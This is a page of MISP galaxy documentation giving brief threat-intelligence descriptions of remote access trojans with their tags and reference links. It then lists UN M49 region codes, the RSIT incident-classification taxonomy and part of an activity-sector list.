RadRAT, its capabilities include: unfettered control of the compromised computer, lateral movement across the organization (Mimikatz-like credentials harvesting, NTLM hash harvesting from the Windows registry and implementation of the Pass-the-Hash attack on SMB connections) and rootkit-like detection-evasion mechanisms.

The tag is: misp-galaxy:rat="RadRAT"

RadRAT has relationships with:

  • similar: misp-galaxy:malpedia="RadRAT" with estimative-language:likelihood-probability="likely"

Table 8807. Table References

Links

https://labs.bitdefender.com/2018/04/radrat-an-all-in-one-toolkit-for-complex-espionage-ops/

https://labs.bitdefender.com/wp-content/uploads/downloads/radrat-an-all-in-one-toolkit-for-complex-espionage-ops/

FlawedAmmyy

FlawedAmmyy, has been used since the beginning of 2016 in both highly targeted email attacks as well as massive, multi-million message campaigns. The RAT is based on leaked source code for Version 3 of the Ammyy Admin remote desktop software. As such FlawedAmmyy contains the functionality of the leaked version, including: Remote Desktop control, File system manager, Proxy support, Audio Chat.

The tag is: misp-galaxy:rat="FlawedAmmyy"

FlawedAmmyy has relationships with:

  • similar: misp-galaxy:malpedia="FlawedAmmyy" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="Truebot" with estimative-language:likelihood-probability="likely"

Table 8808. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat

Spymaster Pro

Monitoring Software

The tag is: misp-galaxy:rat="Spymaster Pro"

Table 8809. Table References

Links

https://www.spymasterpro.com/

https://spycellphone.mobi/reviews/spymaster-pro-real-review-with-screenshots

NavRAT

Classic RAT that can download, upload, execute commands on the victim host and perform keylogging. However, the command and control (C2) infrastructure is very specific. It uses the legitimate Naver email platform in order to communicate with the attackers via email

The tag is: misp-galaxy:rat="NavRAT"

NavRAT has relationships with:

  • similar: misp-galaxy:malpedia="NavRAT" with estimative-language:likelihood-probability="likely"

Table 8810. Table References

Links

https://blog.talosintelligence.com/2018/05/navrat.html

joanap

Joanap is a two-stage malware used to establish peer-to-peer communications and to manage botnets designed to enable other operations. Joanap malware provides HIDDEN COBRA actors with the ability to exfiltrate data, drop and run secondary payloads, and initialize proxy communications on a compromised Windows device.

The tag is: misp-galaxy:rat="joanap"

Table 8811. Table References

Links

https://www.us-cert.gov/ncas/alerts/TA18-149A

Sisfader

Sisfader maintains persistence installing itself as a system service, it is made up of multiple components ([1] Dropper - installing the malware, [2] Agent - main code of the RAT, [3] Config - written to the registry, [4] Auto Loader - responsible for extracting the Agent, the Config from the registry) and it has its own custom protocol for communication.

The tag is: misp-galaxy:rat="Sisfader"

Sisfader has relationships with:

  • similar: misp-galaxy:malpedia="Sisfader" with estimative-language:likelihood-probability="likely"

Table 8812. Table References

Links

https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/june/cve-2017-8750-rtf-and-the-sisfader-rat/

SocketPlayer

The RAT is written in .NET, it uses socket.io for communication. Currently there are two variants of the malware, the 1st variant is a typical downloader whereas the 2nd one has download and C2 functionalities.

The tag is: misp-galaxy:rat="SocketPlayer"

Table 8813. Table References

Links

https://file.gdatasoftware.com/web/en/documents/whitepaper/G_DATA_SocketPlayer_Analysis.pdf

https://volon.io/2018/06/targeted-attack-on-indian-defense-officials-using-socketplayer-malware/

Hallaj PRO RAT

RAT

The tag is: misp-galaxy:rat="Hallaj PRO RAT"

Table 8814. Table References

Links

https://securelist.com/attacks-on-industrial-enterprises-using-rms-and-teamviewer/87104/

TheOneSpy

Remotely monitor and control any wrong activity of kids on all smartphones & computers

The tag is: misp-galaxy:rat="TheOneSpy"

Table 8816. Table References

Links

https://www.theonespy.com/

BONDUPDATER

BONDUPDATER is a PowerShell-based Trojan first discovered by FireEye in mid-November 2017, when OilRig targeted a different Middle Eastern governmental organization. The BONDUPDATER Trojan contains basic backdoor functionality, allowing threat actors to upload and download files, as well as the ability to execute commands. BONDUPDATER, like other OilRig tools, uses DNS tunneling to communicate with its C2 server. During the past month, Unit 42 observed several attacks against a Middle Eastern government leveraging an updated version of the BONDUPDATER malware, which now includes the ability to use TXT records within its DNS tunneling protocol for its C2 communications.

The tag is: misp-galaxy:rat="BONDUPDATER"

Table 8817. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-uses-updated-bondupdater-target-middle-eastern-government/

FlawedGrace

Proofpoint also point out that FlawedGrace is a full-featured RAT written in C++ and that it is a very large program that "extensive use of object-oriented and multithreaded programming techniques. "As a consequence, getting familiar with its internal structure takes a lot of time and is far from a simple task.

The tag is: misp-galaxy:rat="FlawedGrace"

Table 8818. Table References

Links

https://www.bleepingcomputer.com/news/security/new-servhelper-backdoor-and-flawedgrace-rat-pushed-by-necurs-botnet/

H-worm

H-worm is a VBS (Visual Basic Script) based RAT written by an individual going by the name Houdini. We believe the author is based in Algeria and has connections to njq8, the author of njw0rm [1] and njRAT/LV [2] through means of a shared or common code base. We have seen the H-worm RAT being employed in targeted attacks against the international energy industry; however, we also see it being employed in a wider context as run of the mill attacks through spammed email attachments and malicious links.

The tag is: misp-galaxy:rat="H-worm"

H-worm is also known as:

  • WSHRat

  • Houdini

  • Dunihi

H-worm has relationships with:

  • similar: misp-galaxy:tool="Hworm" with estimative-language:likelihood-probability="likely"

Table 8819. Table References

Links

https://www.fireeye.com/blog/threat-research/2013/09/now-you-see-me-h-worm-by-houdini.html

https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape

Parasite-HTTP-RAT

The RAT, dubbed Parasite HTTP, is especially notable for the extensive array of techniques it incorporates for sandbox detection, anti-debugging, anti-emulation, and other protections. The malware is also modular in nature, allowing actors to add new capabilities as they become available or download additional modules post infection.

The tag is: misp-galaxy:rat="Parasite-HTTP-RAT"

Parasite-HTTP-RAT is also known as:

  • Parasite HTTP

Table 8820. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/parasite-http-rat-cooks-stew-stealthy-tricks

Caesar RAT

Caesar is an HTTP-based RAT that allows you to remotely control devices directly from your browser.

The tag is: misp-galaxy:rat="Caesar RAT"

Table 8821. Table References

Links

https://securityonline.info/caesarrat-http-based-rat/

FlawedAmmy

During the month of October, Check Point researchers discovered a widespread malware campaign spreading a remote access trojan (dubbed “FlawedAmmy”) that allows attackers to take over victims’ computers and data. The campaign was the latest and most widespread delivering the ‘FlawedAmmyy’ RAT, following a number of campaigns that have spread this malware in recent months. The Trojan allows attackers to gain full access to the machine’s camera and microphone, collect screen grabs, steal credentials and sensitive files, and intrusively monitor the victims’ actions. As a result, FlawedAmmy is the first RAT to enter the Global Threat Index’s top 10 ranking.

The tag is: misp-galaxy:rat="FlawedAmmy"

Table 8822. Table References

Links

https://www.helpnetsecurity.com/2018/11/14/flawedammy-most-wanted-malware-list/

Felipe

The Zscaler ThreatLabZ team came across a new strain of infostealer Trojan called Felipe, which silently installs itself onto a user’s system and connects to a command-and-control (C&C) server to send system information from the compromised system. This malware is compiled for both 32-bit and 64-bit Windows operating systems. Felipe basically steals the victim’s debit and credit card information and sends it, along with other personal information, to the remote C&C server. It also sets a date and time to perform other malicious activity upon successful infection of the victim machine.

The tag is: misp-galaxy:rat="Felipe"

Table 8823. Table References

Links

https://www.zscaler.com/blogs/research/felipe-new-infostealer-trojan

Amavaldo Banking Trojan

Amavaldo is banking trojan writen in Delphi and known to targeting Spanish or Portuguese speaking countries. It contains backdoor functionality and can work as multi stage. Amavaldo also abuses legitimate tools and softwares

The tag is: misp-galaxy:rat="Amavaldo Banking Trojan"

Table 8824. Table References

Links

https://www.welivesecurity.com/2019/08/01/banking-trojans-amavaldo/

AsyncRAT

Open-Source Remote Administration Tool For Windows C# (RAT)

The tag is: misp-galaxy:rat="AsyncRAT"

Table 8825. Table References

Links

https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp

https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

InnfiRAT

new RAT called InnfiRAT, which is written in .NET and designed to perform specific tasks from an infected machine

The tag is: misp-galaxy:rat="InnfiRAT"

Table 8826. Table References

Links

https://www.zscaler.com/blogs/research/innfirat-new-rat-aiming-your-cryptocurrency-and-more

KeyBase

In the wild since February 2015. The malware comes equipped with a variety of features and can be purchased for $50 directly from the author. It has been deployed in attacks against organizations across many industries and is predominantly delivered via phishing emails.

The tag is: misp-galaxy:rat="KeyBase"

Table 8827. Table References

Links

https://researchcenter.paloaltonetworks.com/2015/06/keybase-keylogger-malware-family-exposed/

Warzone

Apparently existing since 2018

The tag is: misp-galaxy:rat="Warzone"

Table 8828. Table References

Links

https://warzone.pw

SDBbot

SDBbot is a new remote access Trojan (RAT) written in C++ that has been delivered by the Get2 downloader in recent TA505 campaigns. Its name is derived from the debugging log file (sdb.log.txt) and DLL name (BotDLL[.]dll) used in the initial analyzed sample. It also makes use of application shimming [1] for persistence. SDBbot is composed of three pieces: an installer, a loader, and a RAT component.

The tag is: misp-galaxy:rat="SDBbot"

SDBbot is also known as:

  • SDB bot

Table 8829. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader

Sepulcher

A China-based APT has been sending organizations spear-phishing emails that distribute a never-before-seen intelligence-collecting RAT dubbed Sepulcher.

Researchers discovered the new malware being distributed over the past six months through two separate campaigns. The first, in March, targeted European diplomatic and legislative bodies, non-profit policy research organizations and global organizations dealing with economic affairs. The second, in July, targeted Tibetan dissidents. They tied the campaigns to APT group TA413, which researchers say has been associated with Chinese state interests and is known for targeting the Tibetan community.

“Based on the use of publicly known sender addresses associated with Tibetan dissident targeting and the delivery of Sepulcher malware payloads, [we] have attributed both campaigns to the APT actor TA413,” said Proofpoint researchers in a Wednesday analysis. “The usage of publicly known Tibetan-themed sender accounts to deliver Sepulcher malware demonstrates a short-term realignment of TA413’s targets of interest.”

The tag is: misp-galaxy:rat="Sepulcher"

Table 8830. Table References

Links

https://www.enigmasoftware.fr/logicielmalveillantsepulcher-supprimer/

https://threatpost.com/chinese-apt-sepulcher-malware-phishing-attacks/158871/

https://malpedia.caad.fkie.fraunhofer.de/details/win.sepulcher

https://cyware.com/news/chinese-apt-ta413-found-distributing-sepulcher-malware-176a0969

Guildma

The campaign spreads via phishing emails posing as invoices, tax reports, invitations and similar types of messages containing a ZIP archive attachment with a malicious LNK file. When a user opens the malicious LNK file, it abuses the Windows Management Instrumentation Command-line tool and silently downloads a malicious XSL file. The XSL file downloads all of Guildma’s modules and executes a first stage loader, which loads the rest of the modules. The malware is then active and waits for commands from the C&C server and/or specific user interactions, such as opening a webpage of one of the targeted banks.

The tag is: misp-galaxy:rat="Guildma"

Guildma is also known as:

  • Astaroth

Table 8831. Table References

Links

https://www.securityweek.com/guildma-malware-expands-targets-beyond-brazil

https://www.securityweek.com/extensive-living-land-hides-stealthy-malware-campaign

https://isc.sans.edu/diary/rss/28962

alexandre.dulaunoy@circl.lu&utm_medium=InProduct&utm_source=OTX&utm_content=Email&utm_campaign=new_pulse_from_subscribed">https://otx.alienvault.com/pulse/6303804723bccc7e3caad737?utm_userid=alexandre.dulaunoy@circl.lu&utm_medium=InProduct&utm_source=OTX&utm_content=Email&utm_campaign=new_pulse_from_subscribed

Milan

Milan is a 32-bit RAT written in Visual C++ and .NET. Milan is loaded and persists using tasks. An encoded routine waits for three to four seconds between executing the first task, deleting this task, and setting a second scheduled task for persistence.

The tag is: misp-galaxy:rat="Milan"

Milan is also known as:

  • James

Table 8832. Table References

Links

https://www.prevailion.com/latest-targets-of-cyber-group-lyceum/

DarkWatchman

In late November, Prevailion’s Adversarial Counterintelligence Team (PACT) identified what appeared to be a malicious javascript-based Remote Access Trojan (RAT) that uses a robust Domain Generation Algorithm (DGA) to identify its Command and Control (C2) infrastructure and that utilizes novel methods for fileless persistence, on-system activity, and dynamic run-time capabilities like self-updating and recompilation. This RAT, which PACT refers to by its internal codename “DarkWatchman”, has been observed being distributed by email and represents an evolution in fileless malware techniques, as it uses the registry for nearly all temporary and permanent storage and therefore never writes anything to disk, allowing it to operate beneath or around the detection threshold of most security tools. PACT has reverse engineered the DGA, dynamically analyzed the malware, investigated the Threat Actor’s (TA) web-based infrastructure, and consolidated the results of our analysis into the following report.

The tag is: misp-galaxy:rat="DarkWatchman"

DarkWatchman is also known as:

Table 8833. Table References

Links

https://www.prevailion.com/darkwatchman-new-fileness-techniques/

Ragnatela

Malwarebytes Lab identified a new variant of the BADNEWS RAT called Ragnatela. It is being distributed via spear phishing emails to targets of interest in Pakistan. Ragnatela, which means spider web in Italian, is also the project name and panel used by Patchwork APT. Ironically, the threat actor infected themselves with their own RAT.

The tag is: misp-galaxy:rat="Ragnatela"

Ragnatela has relationships with:

  • similar: misp-galaxy:mitre-malware="BADNEWS - S0128" with estimative-language:likelihood-probability="likely"

Table 8834. Table References

Links

https://blog.malwarebytes.com/threat-intelligence/2022/01/patchwork-apt-caught-in-its-own-web/

STRRAT

STRRAT is a Java-based RAT with a JavaScript wrapper/dropper that was discovered in 2020. Its core payload (a .JAR file) is contained under several layers of obfuscation and encoding inside the JavaScript wrapper/dropper.

STRRAT is propagated by malicious email attachments. Its capabilities include standard RAT functionalities (remote access, remote command execution), browser and email-client credential harvesting, and a unique ransomware-like functionality – if instructed, it will add a “.crimson” extension to files on the device, rendering them inoperable (though they can be easily recovered because their content is not modified).

Unlike many Java-based malware, STRRAT does not require Java to be installed on the infected system in order to operate. When the JavaScript wrapper/dropper is executed, if a suitable Java runtime installation is not found, one will be downloaded and installed in order to assure the contained Java payload can execute.

The tag is: misp-galaxy:rat="STRRAT"

Table 8835. Table References

Links

https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape

COATHANGER

Chinese FortiGate RAT. The COATHANGER malware is a remote access trojan (RAT) designed specifically for Fortigate appliances. It is used as second-stage malware, and does not exploit a new vulnerability. Intelligence services MIVD & AIVD refer to the malware as COATHANGER based on a string present in the code./nThe COATHANGER malware is stealthy and persistent. It hides itself by hooking system calls that could reveal its presence. It survives reboots and firmware upgrades./nMIVD & AIVD assess with high confidence that the malicious activity was conducted by a state-sponsored actor from the People’s Republic of China. This is part of a wider trend of Chinese political espionage against the Netherlands and its allies./nMIVD & AIVD assess that use of COATHANGER may be relatively targeted. The Chinese threat actor(s) scan for vulnerable edge devices at scale and gain access opportunistically, and likely introduce COATHANGER as a communication channel for select victims.

The tag is: misp-galaxy:rat="COATHANGER"

Table 8836. Table References

Links

https://github.com/JSCU-NL/COATHANGER

https://www.ncsc.nl/documenten/publicaties/2024/februari/6/mivd-aivd-advisory-coathanger-tlp-clear

https://twitter.com/sehof/status/1754883344574103670

Regions UN M49

Regions based on UN M49..

Regions UN M49 is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Unknown

001 - World

The tag is: misp-galaxy:region="001 - World"

002 - Africa

The tag is: misp-galaxy:region="002 - Africa"

005 - South America

The tag is: misp-galaxy:region="005 - South America"

009 - Oceania

The tag is: misp-galaxy:region="009 - Oceania"

010 - Antarctica

The tag is: misp-galaxy:region="010 - Antarctica"

011 - Western Africa

The tag is: misp-galaxy:region="011 - Western Africa"

013 - Central America

The tag is: misp-galaxy:region="013 - Central America"

014 - Eastern Africa

The tag is: misp-galaxy:region="014 - Eastern Africa"

015 - Northern Africa

The tag is: misp-galaxy:region="015 - Northern Africa"

017 - Middle Africa

The tag is: misp-galaxy:region="017 - Middle Africa"

018 - Southern Africa

The tag is: misp-galaxy:region="018 - Southern Africa"

019 - Americas

The tag is: misp-galaxy:region="019 - Americas"

021 - Northern America

The tag is: misp-galaxy:region="021 - Northern America"

029 - Caribbean

The tag is: misp-galaxy:region="029 - Caribbean"

030 - Eastern Asia

The tag is: misp-galaxy:region="030 - Eastern Asia"

034 - Southern Asia

The tag is: misp-galaxy:region="034 - Southern Asia"

035 - South-eastern Asia

The tag is: misp-galaxy:region="035 - South-eastern Asia"

039 - Southern Europe

The tag is: misp-galaxy:region="039 - Southern Europe"

053 - Australia and New Zealand

The tag is: misp-galaxy:region="053 - Australia and New Zealand"

054 - Melanesia

The tag is: misp-galaxy:region="054 - Melanesia"

057 - Micronesia

The tag is: misp-galaxy:region="057 - Micronesia"

061 - Polynesia

The tag is: misp-galaxy:region="061 - Polynesia"

142 - Asia

The tag is: misp-galaxy:region="142 - Asia"

143 - Central Asia

The tag is: misp-galaxy:region="143 - Central Asia"

145 - Western Asia

The tag is: misp-galaxy:region="145 - Western Asia"

150 - Europe

The tag is: misp-galaxy:region="150 - Europe"

151 - Eastern Europe

The tag is: misp-galaxy:region="151 - Eastern Europe"

154 - Northern Europe

The tag is: misp-galaxy:region="154 - Northern Europe"

155 - Western Europe

The tag is: misp-galaxy:region="155 - Western Europe"

202 - Sub-Saharan Africa

The tag is: misp-galaxy:region="202 - Sub-Saharan Africa"

419 - Latin America and the Caribbean

The tag is: misp-galaxy:region="419 - Latin America and the Caribbean"

830 - Channel Islands

The tag is: misp-galaxy:region="830 - Channel Islands"

rsit

rsit.

rsit is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Koen Van Impe

Abusive Content:Spam

Or 'Unsolicited Bulk Email', this means that the recipient has not granted verifiable permission for the message to be sent and that the message is sent as part of a larger collection of messages, all having a functionally comparable content. This IOC refers to resources, which make up a SPAM infrastructure, be it a harvesters like address verification, URLs in spam e-mails etc.

The tag is: misp-galaxy:rsit="Abusive Content:Spam"

Abusive Content:Spam has relationships with:

  • similar: misp-galaxy:mitre-attack-pattern="Phishing - T1566" with estimative-language:likelihood-probability="likely"

Abusive Content:Harmful Speech

Discretization or discrimination of somebody, e.g. cyber stalking, racism or threats against one or more individuals.

The tag is: misp-galaxy:rsit="Abusive Content:Harmful Speech"

Abusive Content:(Child) Sexual Exploitation/Sexual/Violent Content

Child Sexual Exploitation (CSE), Sexual content, glorification of violence, etc.

The tag is: misp-galaxy:rsit="Abusive Content:(Child) Sexual Exploitation/Sexual/Violent Content"

Abusive Content:(Child) Sexual Exploitation/Sexual/Violent Content has relationships with:

  • similar: misp-galaxy:mitre-attack-pattern="Phishing - T1566" with estimative-language:likelihood-probability="likely"

Malicious Code:Infected System

System infected with malware, e.g. PC, smartphone or server infected with a rootkit. Most often this refers to a connection to a sinkholed C2 server

The tag is: misp-galaxy:rsit="Malicious Code:Infected System"

Malicious Code:C2 Server

Command-and-control server contacted by malware on infected systems.

The tag is: misp-galaxy:rsit="Malicious Code:C2 Server"

Malicious Code:C2 Server has relationships with:

  • similar: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="likely"

Malicious Code:Malware Distribution

URI used for malware distribution, e.g. a download URL included in fake invoice malware spam or exploit-kits (on websites).

The tag is: misp-galaxy:rsit="Malicious Code:Malware Distribution"

Malicious Code:Malware Configuration

URI hosting a malware configuration file, e.g. web-injects for a banking trojan.

The tag is: misp-galaxy:rsit="Malicious Code:Malware Configuration"

Information Gathering:Scanning

Attacks that send requests to a system to discover weaknesses. This also includes testing processes to gather information on hosts, services and accounts. Examples: fingerd, DNS querying, ICMP, SMTP (EXPN, RCPT, …​), port scanning.

The tag is: misp-galaxy:rsit="Information Gathering:Scanning"

Information Gathering:Scanning has relationships with:

  • similar: misp-galaxy:mitre-attack-pattern="Network Service Discovery - T1046" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-attack-pattern="Active Scanning - T1595" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-attack-pattern="Vulnerability Scanning - T1595.002" with estimative-language:likelihood-probability="likely"

Information Gathering:Sniffing

Observing and recording of network traffic (wiretapping).

The tag is: misp-galaxy:rsit="Information Gathering:Sniffing"

Information Gathering:Sniffing has relationships with:

  • similar: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-attack-pattern="Adversary-in-the-Middle - T1557" with estimative-language:likelihood-probability="likely"

Information Gathering:Social Engineering

Gathering information from a human being in a non-technical way (e.g. lies, tricks, bribes, or threats).

The tag is: misp-galaxy:rsit="Information Gathering:Social Engineering"

Intrusion Attempts:Exploitation of known Vulnerabilities

An attempt to compromise a system or to disrupt any service by exploiting vulnerabilities with a standardised identifier such as CVE name (e.g. buffer overflow, backdoor, cross site scripting, etc.)

The tag is: misp-galaxy:rsit="Intrusion Attempts:Exploitation of known Vulnerabilities"

Intrusion Attempts:Exploitation of known Vulnerabilities has relationships with:

  • similar: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-attack-pattern="Exploitation for Defense Evasion - T1211" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="likely"

Intrusion Attempts:Login attempts

Multiple login attempts (Guessing / cracking of passwords, brute force). This IOC refers to a resource, which has been observed to perform brute-force attacks over a given application protocol.

The tag is: misp-galaxy:rsit="Intrusion Attempts:Login attempts"

Intrusion Attempts:Login attempts has relationships with:

  • similar: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-attack-pattern="Password Guessing - T1110.001" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-attack-pattern="Password Cracking - T1110.002" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-attack-pattern="Password Spraying - T1110.003" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-attack-pattern="Credential Stuffing - T1110.004" with estimative-language:likelihood-probability="likely"

Intrusion Attempts:New attack signature

An attack using an unknown exploit.

The tag is: misp-galaxy:rsit="Intrusion Attempts:New attack signature"

Intrusions:Privileged Account Compromise

Compromise of a system where the attacker gained administrative privileges.

The tag is: misp-galaxy:rsit="Intrusions:Privileged Account Compromise"

Intrusions:Privileged Account Compromise has relationships with:

  • similar: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="likely"

Intrusions:Unprivileged Account Compromise

Compromise of a system using an unprivileged (user/service) account.

The tag is: misp-galaxy:rsit="Intrusions:Unprivileged Account Compromise"

Intrusions:Unprivileged Account Compromise has relationships with:

  • similar: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="likely"

Intrusions:Application Compromise

Compromise of an application by exploiting (un-)known software vulnerabilities, e.g. SQL injection.

The tag is: misp-galaxy:rsit="Intrusions:Application Compromise"

Intrusions:Application Compromise has relationships with:

  • similar: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="likely"

Intrusions:System Compromise

Compromise of a system, e.g. unauthorised logins or commands. This includes compromising attempts on honeypot systems.

The tag is: misp-galaxy:rsit="Intrusions:System Compromise"

Intrusions:Burglary

Physical intrusion, e.g. into corporate building or data-centre.

The tag is: misp-galaxy:rsit="Intrusions:Burglary"

Availability:Denial of Service

Denial of Service attack, e.g. sending specially crafted requests to a web application which causes the application to crash or slow down.

The tag is: misp-galaxy:rsit="Availability:Denial of Service"

Availability:Denial of Service has relationships with:

  • similar: misp-galaxy:mitre-attack-pattern="Network Denial of Service - T1498" with estimative-language:likelihood-probability="likely"

Availability:Distributed Denial of Service

Distributed Denial of Service attack, e.g. SYN-Flood or UDP-based reflection/amplification attacks.

The tag is: misp-galaxy:rsit="Availability:Distributed Denial of Service"

Availability:Distributed Denial of Service has relationships with:

  • similar: misp-galaxy:mitre-attack-pattern="Network Denial of Service - T1498" with estimative-language:likelihood-probability="likely"

Availability:Misconfiguration

Software misconfiguration resulting in service availability issues, e.g. DNS server with outdated DNSSEC Root Zone KSK.

The tag is: misp-galaxy:rsit="Availability:Misconfiguration"

Availability:Sabotage

Physical sabotage, e.g cutting wires or malicious arson.

The tag is: misp-galaxy:rsit="Availability:Sabotage"

Availability:Outage

Outage caused e.g. by air condition failure or natural disaster.

The tag is: misp-galaxy:rsit="Availability:Outage"

Information Content Security:Unauthorised access to information

Unauthorised access to information, e.g. by abusing stolen login credentials for a system or application, intercepting traffic or gaining access to physical documents.

The tag is: misp-galaxy:rsit="Information Content Security:Unauthorised access to information"

Information Content Security:Unauthorised modification of information

Unauthorised modification of information, e.g. by an attacker abusing stolen login credentials for a system or application or a ransomware encrypting data. Also includes defacements.

The tag is: misp-galaxy:rsit="Information Content Security:Unauthorised modification of information"

Information Content Security:Unauthorised modification of information has relationships with:

  • similar: misp-galaxy:mitre-attack-pattern="Data Manipulation - T1565" with estimative-language:likelihood-probability="likely"

Information Content Security:Data Loss

Loss of data, e.g. caused by harddisk failure or physical theft.

The tag is: misp-galaxy:rsit="Information Content Security:Data Loss"

Information Content Security:Leak of confidential information

Leaked confidential information like credentials or personal data.

The tag is: misp-galaxy:rsit="Information Content Security:Leak of confidential information"

Fraud:Unauthorised use of resources

Using resources for unauthorised purposes including profit-making ventures, e.g. the use of e-mail to participate in illegal profit chain letters or pyramid schemes.

The tag is: misp-galaxy:rsit="Fraud:Unauthorised use of resources"

Fraud:Copyright

Offering or Installing copies of unlicensed commercial software or other copyright protected materials (Warez).

The tag is: misp-galaxy:rsit="Fraud:Copyright"

Fraud:Masquerade

Type of attack in which one entity illegitimately impersonates the identity of another in order to benefit from it.

The tag is: misp-galaxy:rsit="Fraud:Masquerade"

Fraud:Phishing

Masquerading as another entity in order to persuade the user to reveal private credentials. This IOC most often refers to a URL, which is used to phish user credentials.

The tag is: misp-galaxy:rsit="Fraud:Phishing"

Fraud:Phishing has relationships with:

  • similar: misp-galaxy:mitre-attack-pattern="Phishing - T1566" with estimative-language:likelihood-probability="likely"

Vulnerable:Weak crypto

Publicly accessible services offering weak crypto, e.g. web servers susceptible to POODLE/FREAK attacks.

The tag is: misp-galaxy:rsit="Vulnerable:Weak crypto"

Vulnerable:DDoS amplifier

Publicly accessible services that can be abused for conducting DDoS reflection/amplification attacks, e.g. DNS open-resolvers or NTP servers with monlist enabled.

The tag is: misp-galaxy:rsit="Vulnerable:DDoS amplifier"

Vulnerable:DDoS amplifier has relationships with:

  • similar: misp-galaxy:mitre-attack-pattern="Network Denial of Service - T1498" with estimative-language:likelihood-probability="likely"

Vulnerable:Potentially unwanted accessible services

Potentially unwanted publicly accessible services, e.g. Telnet, RDP or VNC.

The tag is: misp-galaxy:rsit="Vulnerable:Potentially unwanted accessible services"

Vulnerable:Information disclosure

Publicly accessible services potentially disclosing sensitive information, e.g. SNMP or Redis.

The tag is: misp-galaxy:rsit="Vulnerable:Information disclosure"

Vulnerable:Vulnerable system

A system which is vulnerable to certain attacks. Example: misconfigured client proxy settings (example: WPAD), outdated operating system version, XSS vulnerabilities, etc.

The tag is: misp-galaxy:rsit="Vulnerable:Vulnerable system"

Other:Uncategorised

All incidents which don’t fit in one of the given categories should be put into this class or the incident is not categorised.

The tag is: misp-galaxy:rsit="Other:Uncategorised"

Other:Undetermined

The categorisation of the incident is unknown/undetermined.

The tag is: misp-galaxy:rsit="Other:Undetermined"

Test:Test

Meant for testing.

The tag is: misp-galaxy:rsit="Test:Test"

Sector

Activity sectors.

Sector is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Various

Unknown

The tag is: misp-galaxy:sector="Unknown"

Other

The tag is: misp-galaxy:sector="Other"

Academia - University

The tag is: misp-galaxy:sector="Academia - University"

Activists

The tag is: misp-galaxy:sector="Activists"

Aerospace

The tag is: misp-galaxy:sector="Aerospace"

Agriculture

The tag is: misp-galaxy:sector="Agriculture"

Arts

The tag is: misp-galaxy:sector="Arts"

Bank

The tag is: misp-galaxy:sector="Bank"

Chemical

The tag is: misp-galaxy:sector="Chemical"

Citizens

The tag is: misp-galaxy:sector="Citizens"

Civil Aviation

The tag is: misp-galaxy:sector="Civil Aviation"

Country

The tag is: misp-galaxy:sector="Country"

Culture

The tag is: misp-galaxy:sector="Culture"

Data Broker

The tag is: misp-galaxy:sector="Data Broker"

Defense

The tag is: misp-galaxy:sector="Defense"

Development

The tag is: misp-galaxy:sector="Development"

Diplomacy

The tag is: misp-galaxy:sector="Diplomacy"

Education

The tag is: misp-galaxy:sector="Education"

Electric

The tag is: misp-galaxy:sector="Electric"

Electronic

The tag is: misp-galaxy:sector="Electronic"

Employment

The tag is: misp-galaxy:sector="Employment"

Energy

The tag is: misp-galaxy:sector="Energy"

Entertainment

The tag is: misp-galaxy:sector="Entertainment"

Environment

The tag is: misp-galaxy:sector="Environment"

Finance

The tag is: misp-galaxy:sector="Finance"

Finance is also known as:

  • Financial

Food

The tag is: misp-galaxy:sector="Food"

Game

The tag is: misp-galaxy:sector="Game"

Gas

The tag is: misp-galaxy:sector="Gas"

Government, Administration

The tag is: misp-galaxy:sector="Government, Administration"

Government, Administration is also known as:

  • Government

  • Administration

Health

The tag is: misp-galaxy:sector="Health"

Health is also known as:

  • Healthcare

Higher education

The tag is: misp-galaxy:sector="Higher education"

Hotels

The tag is: misp-galaxy:sector="Hotels"

Infrastructure

The tag is: misp-galaxy:sector="Infrastructure"

Intelligence

The tag is: misp-galaxy:sector="Intelligence"

IT

The tag is: misp-galaxy:sector="IT"

IT - Hacker

The tag is: misp-galaxy:sector="IT - Hacker"

IT - ISP

The tag is: misp-galaxy:sector="IT - ISP"

IT - Security

The tag is: misp-galaxy:sector="IT - Security"

Justice

The tag is: misp-galaxy:sector="Justice"

Manufacturing

The tag is: misp-galaxy:sector="Manufacturing"

Maritime

The tag is: misp-galaxy:sector="Maritime"

Military

The tag is: misp-galaxy:sector="Military"

Multi-sector

The tag is: misp-galaxy:sector="Multi-sector"

News - Media

The tag is: misp-galaxy:sector="News - Media"

News - Media is also known as:

  • News

